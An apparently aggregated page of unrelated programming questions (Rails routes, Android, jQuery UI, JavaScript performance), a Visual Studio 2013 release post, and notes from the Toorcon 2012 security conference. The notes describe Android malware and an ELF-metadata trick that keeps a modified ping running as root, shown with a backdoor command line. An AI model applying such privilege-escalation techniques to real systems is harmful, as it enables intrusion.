/projects/:project_id/todos/sort(.:format) todos#sort {:name_prefix=>"project_"} todos GET /projects/:project_id/todos(.:format) todos#index {:name_prefix=>"project_"} POST /projects/:project_id/todos(.:format) todos#create {:name_prefix=>"project_"} new_todo GET /projects/:project_id/todos/new(.:format) todos#new {:name_prefix=>"project_"} edit_todo GET /projects/:project_id/todos/:id/edit(.:format) todos#edit {:name_prefix=>"project_"} todo GET /projects/:project_id/todos/:id(.:format) todos#show {:name_prefix=>"project_"} PUT /projects/:project_id/todos/:id(.:format) todos#update {:name_prefix=>"project_"} DELETE /projects/:project_id/todos/:id(.:format) todos#destroy {:name_prefix=>"project_"} POST /users/:user_id/todos/:id/toggle_complete(.:format) mytodos#toggle_complete {:name_prefix=>"user_"} POST /users/:user_id/todos/sort(.:format) mytodos#sort {:name_prefix=>"user_"} GET /users/:user_id/todos(.:format) mytodos#index {:name_prefix=>"user_"} POST /users/:user_id/todos(.:format) mytodos#create {:name_prefix=>"user_"} GET /users/:user_id/todos/new(.:format) mytodos#new {:name_prefix=>"user_"} GET /users/:user_id/todos/:id/edit(.:format) mytodos#edit {:name_prefix=>"user_"} GET /users/:user_id/todos/:id(.:format) mytodos#show {:name_prefix=>"user_"} PUT /users/:user_id/todos/:id(.:format) mytodos#update {:name_prefix=>"user_"} DELETE /users/:user_id/todos/:id(.:format) mytodos#destroy {:name_prefix=>"user_"} my_todos /my/todos(.:format) mytodos#index /projects/:project_id/todos/show/:id(.:format) todos#show I am guessing that I am not using :name_prefix correctly, resulting in duplicate paths which are then omitted. Any help would be greatly appreciated.

    Read the article

  • how to save state of dynamically created editTexts

    - by user922531
    I'm stuck at how to save the state of my EditTexts on screen orientation. Currently if text is inputted into the EditTexts and the screen is orientated, the fields are wiped (as expected). I am already calling onSaveInstanceState and saving a String, but I have no clue on how to save the EditTexts which are created in code and then retrieve them and add them to the EditTexts when redrawing the activity. Snippet of my code: My main activity is as follows: public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.main); // get the multidim array b = getIntent().getBundleExtra("obj"); m = (Methods) b.getSerializable("Methods"); // method to draw the layout InitialiseUI(); // Restore UI state from the savedInstanceState. if (savedInstanceState != null) { String strValue = savedInstanceState.getString("light"); if (strValue != null) { FLight = strValue; } } try { mCamera = Camera.open(); if (FLight.equals("true")) { flashLight(); } } catch (Exception e) { Log.d(TAG, "Thrown exception onCreate() camera: " + e); } } // end onCreate /** Called when the back button is pressed. */ @Override public void onResume() { super.onResume(); try { mCamera = Camera.open(); if (FLight.equals("true")) { flashLight(); } } catch (Exception e) { Log.d(TAG, "Thrown exception onCreate() camera: " + e); } } // end onCreate /** saves data before leaving the screen */ @Override protected void onSaveInstanceState(Bundle outState) { super.onSaveInstanceState(outState); outState.putString("light", FLight); } /** called when exiting / leaving the screen */ @Override protected void onPause() { super.onPause(); Log.d(TAG, "onPause()"); if (mCamera != null) { mCamera.stopPreview(); mCamera.release(); mCamera = null; } } /* * set up the UI elements - add click listeners to buttons used in * onCreate() and onConfigurationChanged() * * Set the editTexts fields to show the previous readings as Hints */ public void InitialiseUI() { Log.d(TAG, "Start of InitialiseUI, Main activity"); // get a reference to the TableLayout final TableLayout myTLreads = (TableLayout) findViewById(R.id.myTLreads); // Create arrays to hold the TVs and ETs final TextView[] myTextViews = new TextView[m.getNoRows()]; // create an empty array; final EditText[] myEditTexts = new EditText[m.getNoRows()]; // create an empty array; for(int i =0; i<=m.getNoRows()-1;i++ ){ TableRow tr=new TableRow(this); tr.setLayoutParams(new LayoutParams( LayoutParams.MATCH_PARENT, LayoutParams.WRAP_CONTENT)); // create a new textview / editText final TextView rowTextView = new TextView(this); final EditText rowEditText = new EditText(this); // setWidth is needed otherwise my landscape layout is OFF rowEditText.setWidth(400); // this stops the keyboard taking up the whole screen in landscape layout rowEditText.setImeOptions(EditorInfo.IME_FLAG_NO_EXTRACT_UI); // add some padding to the right of the TV rowTextView.setPadding(0,0,10,0); // set colors to white rowTextView.setTextColor(Color.parseColor("#FFFFFF")); rowEditText.setTextColor(Color.parseColor("#FFFFFF")); // if readings already sent today set color to yellow if(m.getTransmit(i+1)==false){ rowEditText.setEnabled(false); rowEditText.setHintTextColor(Color.parseColor("#FFFF00")); } // set the text of the TV to the meter name rowTextView.setText(m.getMeterName(i+1)); // set the hint of the ET to the last submitted reading rowEditText.setHint(m.getLastReadString(i+1)); // add the textview to the linearlayout rowEditText.setInputType(InputType.TYPE_CLASS_PHONE);//InputType.TYPE_NUMBER_FLAG_DECIMAL); tr.addView(rowTextView); tr.addView(rowEditText); myTLreads.addView(tr); // add a reference to the textView myTextViews[i] = rowTextView; myEditTexts[i] = rowEditText; } final Button submit = (Button) findViewById(R.id.submitReadings); // add a click listener to the button try { submit.setOnClickListener(new View.OnClickListener() { public void onClick(View v) { Log.d(TAG, "Submit button clicked, Main activity"); preSubmitCheck(m.getAccNo(), m.getPostCode(), myEditTexts); // method to do HTML getting and sending } }); } catch (Exception e) { Log.d(TAG, "Exceptions (submit button)" + e.toString()); } }// end of InitialiseUI I don't need to do anything with these values until a button is clicked. Would it be easier if they were a ListView, i'm guessing I would still have the problem of saving them and retrieving them on rotation. If it helps I have an object m which is a string[][] I could temporarily somehow store them in

    Read the article

  • Re-opening closed dialog puts it in the start position after moving it

    - by semmelbroesel
    I'm using multiple instances of the JQuery-UI dialog along with draggable and resizable. Whenever I drag or resize one of the dialog boxes, the position and dimensions of the current box are saved to a database and then loaded the next time the page opens. This is working well. However, when I close a dialog box and re-open it using a button, jQuery sets the position of the box back to its original location in the center of the screen. Furthermore, I use a show effect to slide the box off to the left on closing and in from the left on re-opening. I found two ways to update its position when the slide in animation is done, however, it still slides into the center of the screen, and I have yet to find a way to get it to slide in towards the location it is supposed to have. Here are the parts of the code that play a part in this: $('.box').dialog({ closeOnEscape: false, hide: { effect: "drop", direction: 'left' }, beforeClose: function (evt, ui){ var $this = $(this); SavePos($this); // saves the dimensions to db }, dragStop: function() { var $this = $(this); SavePos($this); }, resizeStop: function() { var $this = $(this); SavePos($this); }, open: function() { var $this = $(this); $this.dialog('option', { show: { effect: "drop", direction: 'left'} } ); if (init) // meaning only load this code when the page has finished initializing { // tried it both ways - set the position before and after the effect - no success UpdatePos($this.attr('id')); // I tried this section with promise() and effect / complete - I found no difference $this.parent().promise().done(function() { UpdatePos($this.attr('id')); }); } } }); function UpdatePos(key) { // boxpos is an object holding the position for each box by the box's id var $this = $('#' + key); //console.log('updating pos for box ' + boxid); if ($this && $this.hasClass('ui-dialog-content')) { //console.log($this.dialog('widget').css('left')); $this.dialog('option', { width: boxpos[key].width, height: boxpos[key].height }); $this.dialog('widget').css({ left: boxpos[key].left + 'px', top: boxpos[key].top + 'px' }); //console.log('finished updating pos'); //console.log($this.dialog('widget').css('left')); } } The button that re-opens the box has this code on it to make that happen: var $box = $('#boxid'); if ($box) { if ($box.dialog('isOpen')) { $box.dialog('moveToTop'); } else { $box.dialog("open") } } I don't know what jQuery-UI does to the box as it hides it (other than display:none) or to make it slide in, so maybe there's something I'm missing here that might help... Basically, I need JQuery to remember the box' position and put the box back into that location when it is re-opened. It took me days to make it this far, but this is one obstacle I have yet to overcome. Maybe there's a different way I can re-open the box? Thanks! EDIT: Forgot - this issue ONLY happens when I use my UpdatePos function to set the location of a box (i.e. on page load). When I drag a box with my mouse, close it, and re-open it, everything works. So I'm guessing there's one more storage location for the box' position that I'm missing here... EDIT2: After more messing with it, my code for debugging now looks like this: open: function() { var $this = $(this); console.log('box open'); console.log($this.dialog('widget').position()); // { top=0, left=-78.5} console.log($this.dialog('widget').css('left')); $this.dialog('option', { show: { effect: "drop", direction: 'left'} } ); if (init) { UpdatePos($this.attr('id')); $this.parent().promise().done(function() { console.log($this.dialog('widget').position()); // { top=313, left=641.5} console.log($this.dialog('widget').css('left')); UpdatePos($this.attr('id')); console.log($this.dialog('widget').position()); // { top=121, left=107} console.log($this.dialog('widget').css('left')); }); } The results I'm getting are: box open Object { top=0, left=-78.5} -78.5px Object { top=313, left=641.5} 641.5px Object { top=121, left=107} 107px So looks to me as if the widget is being moved off screen (left=-78.5) and then moved for the animation, and then my code moves it into the location that it should be in (121/107). The position() results for $box.position() or $box.dialog().position() do not change during this debugging section. Maybe this will help someone here - I'm still out of ideas here... ... and I just discovered that when I drag the item around myself, then close and re-open it, it is very unpredictable. Sometimes, it will end up in the correct location horizontally, but not vertically. Sometimes, it will end up back in the center of the screen...

    Read the article

  • Accessing local variable doesn't improve performance

    - by NicMagnier
    The short version Why is this code: var index = (Math.floor(y / scale) * img.width + Math.floor(x / scale)) * 4; More performant than this one? var index = Math.floor(ref_index) * 4; The long version This week, the author of Impact js published an article about some rendering issue: http://www.phoboslab.org/log/2012/09/drawing-pixels-is-hard In the article there was the source of a function to scale an image by accessing pixels in the canvas. I wanted to suggest some traditional ways to optimize this kind of code so that the scaling would be shorter at loading time. But after testing it my result was most of the time worst that the original function. Guessing this was the JavaScript engine that was doing some smart optimization I tried to understand a bit more what was going on so I did a bunch of test. But my results are quite confusing and I would need some help to understand what's going on. I have a test page here: http://www.mx981.com/stuff/resize_bench/test.html jsPerf: http://jsperf.com/local-variable-due-to-the-scope-lookup To start the test, click the picture and the results will appear in the console. There are three different versions: The original code: for( var y = 0; y < heightScaled; y++ ) { for( var x = 0; x < widthScaled; x++ ) { var index = (Math.floor(y / scale) * img.width + Math.floor(x / scale)) * 4; var indexScaled = (y * widthScaled + x) * 4; scaledPixels.data[ indexScaled ] = origPixels.data[ index ]; scaledPixels.data[ indexScaled+1 ] = origPixels.data[ index+1 ]; scaledPixels.data[ indexScaled+2 ] = origPixels.data[ index+2 ]; scaledPixels.data[ indexScaled+3 ] = origPixels.data[ index+3 ]; } } jsPerf: http://jsperf.com/so-accessing-local-variable-doesn-t-improve-performance One of my attempt to optimize it: var ref_index = 0; var ref_indexScaled = 0 var ref_step = 1 / scale; for( var y = 0; y < heightScaled; y++ ) { for( var x = 0; x < widthScaled; x++ ) { var index = Math.floor(ref_index) * 4; scaledPixels.data[ ref_indexScaled++ ] = origPixels.data[ index ]; scaledPixels.data[ ref_indexScaled++ ] = origPixels.data[ index+1 ]; scaledPixels.data[ ref_indexScaled++ ] = origPixels.data[ index+2 ]; scaledPixels.data[ ref_indexScaled++ ] = origPixels.data[ index+3 ]; ref_index+= ref_step; } } jsPerf: http://jsperf.com/so-accessing-local-variable-doesn-t-improve-performance The same optimized code but with recalculating the index variable each time (Hybrid) var ref_index = 0; var ref_indexScaled = 0 var ref_step = 1 / scale; for( var y = 0; y < heightScaled; y++ ) { for( var x = 0; x < widthScaled; x++ ) { var index = (Math.floor(y / scale) * img.width + Math.floor(x / scale)) * 4; scaledPixels.data[ ref_indexScaled++ ] = origPixels.data[ index ]; scaledPixels.data[ ref_indexScaled++ ] = origPixels.data[ index+1 ]; scaledPixels.data[ ref_indexScaled++ ] = origPixels.data[ index+2 ]; scaledPixels.data[ ref_indexScaled++ ] = origPixels.data[ index+3 ]; ref_index+= ref_step; } } jsPerf: http://jsperf.com/so-accessing-local-variable-doesn-t-improve-performance The only difference in the two last one is the calculation of the 'index' variable. And to my surprise the optimized version is slower in most browsers (except opera). Results of personal testing (not the jsPerf tests): Opera Original: 8668ms Optimized: 932ms Hybrid: 8696ms Chrome Original: 139ms Optimized: 145ms Hybrid: 136ms Safari Original: 433ms Optimized: 853ms Hybrid: 451ms Firefox Original: 343ms Optimized: 422ms Hybrid: 350ms After digging around, it seems an usual good practice is to access mainly local variable due to the scope lookup. Because The optimized version only call one local variable it should be faster that the Hybrid code which call multiple variable and object in addition to the various operation involved. So why the "optimized" version is slower? I thought that it might be because some JavaScript engine don't optimize the Optimized version because it is not hot enough but after using --trace-opt in chrome, it seems all version are properly compiled by V8. At this point I am a bit clueless and wonder if somebody would know what is going on? I did also some more test cases in this page: http://www.mx981.com/stuff/resize_bench/index.html

    Read the article

  • Announcing the Release of Visual Studio 2013 and Great Improvements to ASP.NET and Entity Framework

    - by ScottGu
    Today we released VS 2013 and .NET 4.5.1. These releases include a ton of great improvements, and include some fantastic enhancements to ASP.NET and the Entity Framework.  You can download and start using them now. Below are details on a few of the great ASP.NET, Web Development, and Entity Framework improvements you can take advantage of with this release.  Please visit http://www.asp.net/vnext for additional release notes, documentation, and tutorials. One ASP.NET With the release of Visual Studio 2013, we have taken a step towards unifying the experience of using the different ASP.NET sub-frameworks (Web Forms, MVC, Web API, SignalR, etc), and you can now easily mix and match the different ASP.NET technologies you want to use within a single application. When you do a File-New Project with VS 2013 you’ll now see a single ASP.NET Project option: Selecting this project will bring up an additional dialog that allows you to start with a base project template, and then optionally add/remove the technologies you want to use in it.  For example, you could start with a Web Forms template and add Web API or Web Forms support for it, or create a MVC project and also enable Web Forms pages within it: This makes it easy for you to use any ASP.NET technology you want within your apps, and take advantage of any feature across the entire ASP.NET technology span. Richer Authentication Support The new “One ASP.NET” project dialog also includes a new Change Authentication button that, when pushed, enables you to easily change the authentication approach used by your applications – and makes it much easier to build secure applications that enable SSO from a variety of identity providers.  For example, when you start with the ASP.NET Web Forms or MVC templates you can easily add any of the following authentication options to the application: No Authentication Individual User Accounts (Single Sign-On support with FaceBook, Twitter, Google, and Microsoft ID – or Forms Auth with ASP.NET Membership) Organizational Accounts (Single Sign-On support with Windows Azure Active Directory ) Windows Authentication (Active Directory in an intranet application) The Windows Azure Active Directory support is particularly cool.  Last month we updated Windows Azure Active Directory so that developers can now easily create any number of Directories using it (for free and deployed within seconds).  It now takes only a few moments to enable single-sign-on support within your ASP.NET applications against these Windows Azure Active Directories.  Simply choose the “Organizational Accounts” radio button within the Change Authentication dialog and enter the name of your Windows Azure Active Directory to do this: This will automatically configure your ASP.NET application to use Windows Azure Active Directory and register the application with it.  Now when you run the app your users can easily and securely sign-in using their Active Directory credentials within it – regardless of where the application is hosted on the Internet. For more information about the new process for creating web projects, see Creating ASP.NET Web Projects in Visual Studio 2013. Responsive Project Templates with Bootstrap The new default project templates for ASP.NET Web Forms, MVC, Web API and SPA are built using Bootstrap. Bootstrap is an open source CSS framework that helps you build responsive websites which look great on different form factors such as mobile phones, tables and desktops. For example in a browser window the home page created by the MVC template looks like the following: When you resize the browser to a narrow window to see how it would like on a phone, you can notice how the contents gracefully wrap around and the horizontal top menu turns into an icon: When you click the menu-icon above it expands into a vertical menu – which enables a good navigation experience for small screen real-estate devices: We think Bootstrap will enable developers to build web applications that work even better on phones, tablets and other mobile devices – and enable you to easily build applications that can leverage the rich ecosystem of Bootstrap CSS templates already out there.  You can learn more about Bootstrap here. Visual Studio Web Tooling Improvements Visual Studio 2013 includes a new, much richer, HTML editor for Razor files and HTML files in web applications. The new HTML editor provides a single unified schema based on HTML5. It has automatic brace completion, jQuery UI and AngularJS attribute IntelliSense, attribute IntelliSense Grouping, and other great improvements. For example, typing “ng-“ on an HTML element will show the intellisense for AngularJS: This support for AngularJS, Knockout.js, Handlebars and other SPA technologies in this release of ASP.NET and VS 2013 makes it even easier to build rich client web applications: The screen shot below demonstrates how the HTML editor can also now inspect your page at design-time to determine all of the CSS classes that are available. In this case, the auto-completion list contains classes from Bootstrap’s CSS file. No more guessing at which Bootstrap element names you need to use: Visual Studio 2013 also comes with built-in support for both CoffeeScript and LESS editing support. The LESS editor comes with all the cool features from the CSS editor and has specific Intellisense for variables and mixins across all the LESS documents in the @import chain. Browser Link – SignalR channel between browser and Visual Studio The new Browser Link feature in VS 2013 lets you run your app within multiple browsers on your dev machine, connect them to Visual Studio, and simultaneously refresh all of them just by clicking a button in the toolbar. You can connect multiple browsers (including IE, FireFox, Chrome) to your development site, including mobile emulators, and click refresh to refresh all the browsers all at the same time.  This makes it much easier to easily develop/test against multiple browsers in parallel. Browser Link also exposes an API to enable developers to write Browser Link extensions.  By enabling developers to take advantage of the Browser Link API, it becomes possible to create very advanced scenarios that crosses boundaries between Visual Studio and any browser that’s connected to it. Web Essentials takes advantage of the API to create an integrated experience between Visual Studio and the browser’s developer tools, remote controlling mobile emulators and a lot more. You will see us take advantage of this support even more to enable really cool scenarios going forward. ASP.NET Scaffolding ASP.NET Scaffolding is a new code generation framework for ASP.NET Web applications. It makes it easy to add boilerplate code to your project that interacts with a data model. In previous versions of Visual Studio, scaffolding was limited to ASP.NET MVC projects. With Visual Studio 2013, you can now use scaffolding for any ASP.NET project, including Web Forms. When using scaffolding, we ensure that all required dependencies are automatically installed for you in the project. For example, if you start with an ASP.NET Web Forms project and then use scaffolding to add a Web API Controller, the required NuGet packages and references to enable Web API are added to your project automatically.  To do this, just choose the Add->New Scaffold Item context menu: Support for scaffolding async controllers uses the new async features from Entity Framework 6. ASP.NET Identity ASP.NET Identity is a new membership system for ASP.NET applications that we are introducing with this release. ASP.NET Identity makes it easy to integrate user-specific profile data with application data. ASP.NET Identity also allows you to choose the persistence model for user profiles in your application. You can store the data in a SQL Server database or another data store, including NoSQL data stores such as Windows Azure Storage Tables. ASP.NET Identity also supports Claims-based authentication, where the user’s identity is represented as a set of claims from a trusted issuer. Users can login by creating an account on the website using username and password, or they can login using social identity providers (such as Microsoft Account, Twitter, Facebook, Google) or using organizational accounts through Windows Azure Active Directory or Active Directory Federation Services (ADFS). To learn more about how to use ASP.NET Identity visit http://www.asp.net/identity.  ASP.NET Web API 2 ASP.NET Web API 2 has a bunch of great improvements including: Attribute routing ASP.NET Web API now supports attribute routing, thanks to a contribution by Tim McCall, the author of http://attributerouting.net. With attribute routing you can specify your Web API routes by annotating your actions and controllers like this: OAuth 2.0 support The Web API and Single Page Application project templates now support authorization using OAuth 2.0. OAuth 2.0 is a framework for authorizing client access to protected resources. It works for a variety of clients including browsers and mobile devices. OData Improvements ASP.NET Web API also now provides support for OData endpoints and enables support for both ATOM and JSON-light formats. With OData you get support for rich query semantics, paging, $metadata, CRUD operations, and custom actions over any data source. Below are some of the specific enhancements in ASP.NET Web API 2 OData. Support for $select, $expand, $batch, and $value Improved extensibility Type-less support Reuse an existing model OWIN Integration ASP.NET Web API now fully supports OWIN and can be run on any OWIN capable host. With OWIN integration, you can self-host Web API in your own process alongside other OWIN middleware, such as SignalR. For more information, see Use OWIN to Self-Host ASP.NET Web API. More Web API Improvements In addition to the features above there have been a host of other features in ASP.NET Web API, including CORS support Authentication Filters Filter Overrides Improved Unit Testability Portable ASP.NET Web API Client To learn more go to http://www.asp.net/web-api/ ASP.NET SignalR 2 ASP.NET SignalR is library for ASP.NET developers that dramatically simplifies the process of adding real-time web functionality to your applications. Real-time web functionality is the ability to have server-side code push content to connected clients instantly as it becomes available. SignalR 2.0 introduces a ton of great improvements. We’ve added support for Cross-Origin Resource Sharing (CORS) to SignalR 2.0. iOS and Android support for SignalR have also been added using the MonoTouch and MonoDroid components from the Xamarin library (for more information on how to use these additions, see the article Using Xamarin Components from the SignalR wiki). We’ve also added support for the Portable .NET Client in SignalR 2.0 and created a new self-hosting package. This change makes the setup process for SignalR much more consistent between web-hosted and self-hosted SignalR applications. To learn more go to http://www.asp.net/signalr. ASP.NET MVC 5 The ASP.NET MVC project templates integrate seamlessly with the new One ASP.NET experience and enable you to integrate all of the above ASP.NET Web API, SignalR and Identity improvements. You can also customize your MVC project and configure authentication using the One ASP.NET project creation wizard. The MVC templates have also been updated to use ASP.NET Identity and Bootstrap as well. An introductory tutorial to ASP.NET MVC 5 can be found at Getting Started with ASP.NET MVC 5. This release of ASP.NET MVC also supports several nice new MVC-specific features including: Authentication filters: These filters allow you to specify authentication logic per-action, per-controller or globally for all controllers. Attribute Routing: Attribute Routing allows you to define your routes on actions or controllers. To learn more go to http://www.asp.net/mvc Entity Framework 6 Improvements Visual Studio 2013 ships with Entity Framework 6, which bring a lot of great new features to the data access space: Async and Task<T> Support EF6’s new Async Query and Save support enables you to perform asynchronous data access and take advantage of the Task<T> support introduced in .NET 4.5 within data access scenarios.  This allows you to free up threads that might otherwise by blocked on data access requests, and enable them to be used to process other requests whilst you wait for the database engine to process operations. When the database server responds the thread will be re-queued within your ASP.NET application and execution will continue.  This enables you to easily write significantly more scalable server code. Here is an example ASP.NET WebAPI action that makes use of the new EF6 async query methods: Interception and Logging Interception and SQL logging allows you to view – or even change – every command that is sent to the database by Entity Framework. This includes a simple, human readable log – which is great for debugging – as well as some lower level building blocks that give you access to the command and results. Here is an example of wiring up the simple log to Debug in the constructor of an MVC controller: Custom Code-First Conventions The new Custom Code-First Conventions enable bulk configuration of a Code First model – reducing the amount of code you need to write and maintain. Conventions are great when your domain classes don’t match the Code First conventions. For example, the following convention configures all properties that are called ‘Key’ to be the primary key of the entity they belong to. This is different than the default Code First convention that expects Id or <type name>Id. Connection Resiliency The new Connection Resiliency feature in EF6 enables you to register an execution strategy to handle – and potentially retry – failed database operations. This is especially useful when deploying to cloud environments where dropped connections become more common as you traverse load balancers and distributed networks. EF6 includes a built-in execution strategy for SQL Azure that knows about retryable exception types and has some sensible – but overridable – defaults for the number of retries and time between retries when errors occur. Registering it is simple using the new Code-Based Configuration support: These are just some of the new features in EF6. You can visit the release notes section of the Entity Framework site for a complete list of new features. Microsoft OWIN Components Open Web Interface for .NET (OWIN) defines an open abstraction between .NET web servers and web applications, and the ASP.NET “Katana” project brings this abstraction to ASP.NET. OWIN decouples the web application from the server, making web applications host-agnostic. For example, you can host an OWIN-based web application in IIS or self-host it in a custom process. For more information about OWIN and Katana, see What's new in OWIN and Katana. Summary Today’s Visual Studio 2013, ASP.NET and Entity Framework release delivers some fantastic new features that streamline your web development lifecycle. These feature span from server framework to data access to tooling to client-side HTML development.  They also integrate some great open-source technology and contributions from our developer community. Download and start using them today! Scott P.S. In addition to blogging, I am also now using Twitter for quick updates and to share links. Follow me at: twitter.com/scottgu

    Read the article

  • Toorcon14

    - by danx
    Toorcon 2012 Information Security Conference San Diego, CA, http://www.toorcon.org/ Dan Anderson, October 2012 It's almost Halloween, and we all know what that means—yes, of course, it's time for another Toorcon Conference! Toorcon is an annual conference for people interested in computer security. This includes the whole range of hackers, computer hobbyists, professionals, security consultants, press, law enforcement, prosecutors, FBI, etc. We're at Toorcon 14—see earlier blogs for some of the previous Toorcon's I've attended (back to 2003). This year's "con" was held at the Westin on Broadway in downtown San Diego, California. The following are not necessarily my views—I'm just the messenger—although I could have misquoted or misparaphrased the speakers. Also, I only reviewed some of the talks, below, which I attended and interested me. MalAndroid—the Crux of Android Infections, Aditya K. Sood Programming Weird Machines with ELF Metadata, Rebecca "bx" Shapiro Privacy at the Handset: New FCC Rules?, Valkyrie Hacking Measured Boot and UEFI, Dan Griffin You Can't Buy Security: Building the Open Source InfoSec Program, Boris Sverdlik What Journalists Want: The Investigative Reporters' Perspective on Hacking, Dave Maas & Jason Leopold Accessibility and Security, Anna Shubina Stop Patching, for Stronger PCI Compliance, Adam Brand McAfee Secure & Trustmarks — a Hacker's Best Friend, Jay James & Shane MacDougall MalAndroid—the Crux of Android Infections Aditya K. Sood, IOActive, Michigan State PhD candidate Aditya talked about Android smartphone malware. There's a lot of old Android software out there—over 50% Gingerbread (2.3.x)—and most have unpatched vulnerabilities. Of 9 Android vulnerabilities, 8 have known exploits (such as the old Gingerbread Global Object Table exploit). Android protection includes sandboxing, security scanner, app permissions, and screened Android app market. The Android permission checker has fine-grain resource control, policy enforcement. Android static analysis also includes a static analysis app checker (bouncer), and a vulnerablity checker. What security problems does Android have? User-centric security, which depends on the user to grant permission and make smart decisions. But users don't care or think about malware (the're not aware, not paranoid). All they want is functionality, extensibility, mobility Android had no "proper" encryption before Android 3.0 No built-in protection against social engineering and web tricks Alternative Android app markets are unsafe. Simply visiting some markets can infect Android Aditya classified Android Malware types as: Type A—Apps. These interact with the Android app framework. For example, a fake Netflix app. Or Android Gold Dream (game), which uploads user files stealthy manner to a remote location. Type K—Kernel. Exploits underlying Linux libraries or kernel Type H—Hybrid. These use multiple layers (app framework, libraries, kernel). These are most commonly used by Android botnets, which are popular with Chinese botnet authors What are the threats from Android malware? These incude leak info (contacts), banking fraud, corporate network attacks, malware advertising, malware "Hackivism" (the promotion of social causes. For example, promiting specific leaders of the Tunisian or Iranian revolutions. Android malware is frequently "masquerated". That is, repackaged inside a legit app with malware. To avoid detection, the hidden malware is not unwrapped until runtime. The malware payload can be hidden in, for example, PNG files. Less common are Android bootkits—there's not many around. What they do is hijack the Android init framework—alteering system programs and daemons, then deletes itself. For example, the DKF Bootkit (China). Android App Problems: no code signing! all self-signed native code execution permission sandbox — all or none alternate market places no robust Android malware detection at network level delayed patch process Programming Weird Machines with ELF Metadata Rebecca "bx" Shapiro, Dartmouth College, NH https://github.com/bx/elf-bf-tools @bxsays on twitter Definitions. "ELF" is an executable file format used in linking and loading executables (on UNIX/Linux-class machines). "Weird machine" uses undocumented computation sources (I think of them as unintended virtual machines). Some examples of "weird machines" are those that: return to weird location, does SQL injection, corrupts the heap. Bx then talked about using ELF metadata as (an uintended) "weird machine". Some ELF background: A compiler takes source code and generates a ELF object file (hello.o). A static linker makes an ELF executable from the object file. A runtime linker and loader takes ELF executable and loads and relocates it in memory. The ELF file has symbols to relocate functions and variables. ELF has two relocation tables—one at link time and another one at loading time: .rela.dyn (link time) and .dynsym (dynamic table). GOT: Global Offset Table of addresses for dynamically-linked functions. PLT: Procedure Linkage Tables—works with GOT. The memory layout of a process (not the ELF file) is, in order: program (+ heap), dynamic libraries, libc, ld.so, stack (which includes the dynamic table loaded into memory) For ELF, the "weird machine" is found and exploited in the loader. ELF can be crafted for executing viruses, by tricking runtime into executing interpreted "code" in the ELF symbol table. One can inject parasitic "code" without modifying the actual ELF code portions. Think of the ELF symbol table as an "assembly language" interpreter. It has these elements: instructions: Add, move, jump if not 0 (jnz) Think of symbol table entries as "registers" symbol table value is "contents" immediate values are constants direct values are addresses (e.g., 0xdeadbeef) move instruction: is a relocation table entry add instruction: relocation table "addend" entry jnz instruction: takes multiple relocation table entries The ELF weird machine exploits the loader by relocating relocation table entries. The loader will go on forever until told to stop. It stores state on stack at "end" and uses IFUNC table entries (containing function pointer address). The ELF weird machine, called "Brainfu*k" (BF) has: 8 instructions: pointer inc, dec, inc indirect, dec indirect, jump forward, jump backward, print. Three registers - 3 registers Bx showed example BF source code that implemented a Turing machine printing "hello, world". More interesting was the next demo, where bx modified ping. Ping runs suid as root, but quickly drops privilege. BF modified the loader to disable the library function call dropping privilege, so it remained as root. Then BF modified the ping -t argument to execute the -t filename as root. It's best to show what this modified ping does with an example: $ whoami bx $ ping localhost -t backdoor.sh # executes backdoor $ whoami root $ The modified code increased from 285948 bytes to 290209 bytes. A BF tool compiles "executable" by modifying the symbol table in an existing ELF executable. The tool modifies .dynsym and .rela.dyn table, but not code or data. Privacy at the Handset: New FCC Rules? "Valkyrie" (Christie Dudley, Santa Clara Law JD candidate) Valkyrie talked about mobile handset privacy. Some background: Senator Franken (also a comedian) became alarmed about CarrierIQ, where the carriers track their customers. Franken asked the FCC to find out what obligations carriers think they have to protect privacy. The carriers' response was that they are doing just fine with self-regulation—no worries! Carriers need to collect data, such as missed calls, to maintain network quality. But carriers also sell data for marketing. Verizon sells customer data and enables this with a narrow privacy policy (only 1 month to opt out, with difficulties). The data sold is not individually identifiable and is aggregated. But Verizon recommends, as an aggregation workaround to "recollate" data to other databases to identify customers indirectly. The FCC has regulated telephone privacy since 1934 and mobile network privacy since 2007. Also, the carriers say mobile phone privacy is a FTC responsibility (not FCC). FTC is trying to improve mobile app privacy, but FTC has no authority over carrier / customer relationships. As a side note, Apple iPhones are unique as carriers have extra control over iPhones they don't have with other smartphones. As a result iPhones may be more regulated. Who are the consumer advocates? Everyone knows EFF, but EPIC (Electrnic Privacy Info Center), although more obsecure, is more relevant. What to do? Carriers must be accountable. Opt-in and opt-out at any time. Carriers need incentive to grant users control for those who want it, by holding them liable and responsible for breeches on their clock. Location information should be added current CPNI privacy protection, and require "Pen/trap" judicial order to obtain (and would still be a lower standard than 4th Amendment). Politics are on a pro-privacy swing now, with many senators and the Whitehouse. There will probably be new regulation soon, and enforcement will be a problem, but consumers will still have some benefit. Hacking Measured Boot and UEFI Dan Griffin, JWSecure, Inc., Seattle, @JWSdan Dan talked about hacking measured UEFI boot. First some terms: UEFI is a boot technology that is replacing BIOS (has whitelisting and blacklisting). UEFI protects devices against rootkits. TPM - hardware security device to store hashs and hardware-protected keys "secure boot" can control at firmware level what boot images can boot "measured boot" OS feature that tracks hashes (from BIOS, boot loader, krnel, early drivers). "remote attestation" allows remote validation and control based on policy on a remote attestation server. Microsoft pushing TPM (Windows 8 required), but Google is not. Intel TianoCore is the only open source for UEFI. Dan has Measured Boot Tool at http://mbt.codeplex.com/ with a demo where you can also view TPM data. TPM support already on enterprise-class machines. UEFI Weaknesses. UEFI toolkits are evolving rapidly, but UEFI has weaknesses: assume user is an ally trust TPM implicitly, and attached to computer hibernate file is unprotected (disk encryption protects against this) protection migrating from hardware to firmware delays in patching and whitelist updates will UEFI really be adopted by the mainstream (smartphone hardware support, bank support, apathetic consumer support) You Can't Buy Security: Building the Open Source InfoSec Program Boris Sverdlik, ISDPodcast.com co-host Boris talked about problems typical with current security audits. "IT Security" is an oxymoron—IT exists to enable buiness, uptime, utilization, reporting, but don't care about security—IT has conflict of interest. There's no Magic Bullet ("blinky box"), no one-size-fits-all solution (e.g., Intrusion Detection Systems (IDSs)). Regulations don't make you secure. The cloud is not secure (because of shared data and admin access). Defense and pen testing is not sexy. Auditors are not solution (security not a checklist)—what's needed is experience and adaptability—need soft skills. Step 1: First thing is to Google and learn the company end-to-end before you start. Get to know the management team (not IT team), meet as many people as you can. Don't use arbitrary values such as CISSP scores. Quantitive risk assessment is a myth (e.g. AV*EF-SLE). Learn different Business Units, legal/regulatory obligations, learn the business and where the money is made, verify company is protected from script kiddies (easy), learn sensitive information (IP, internal use only), and start with 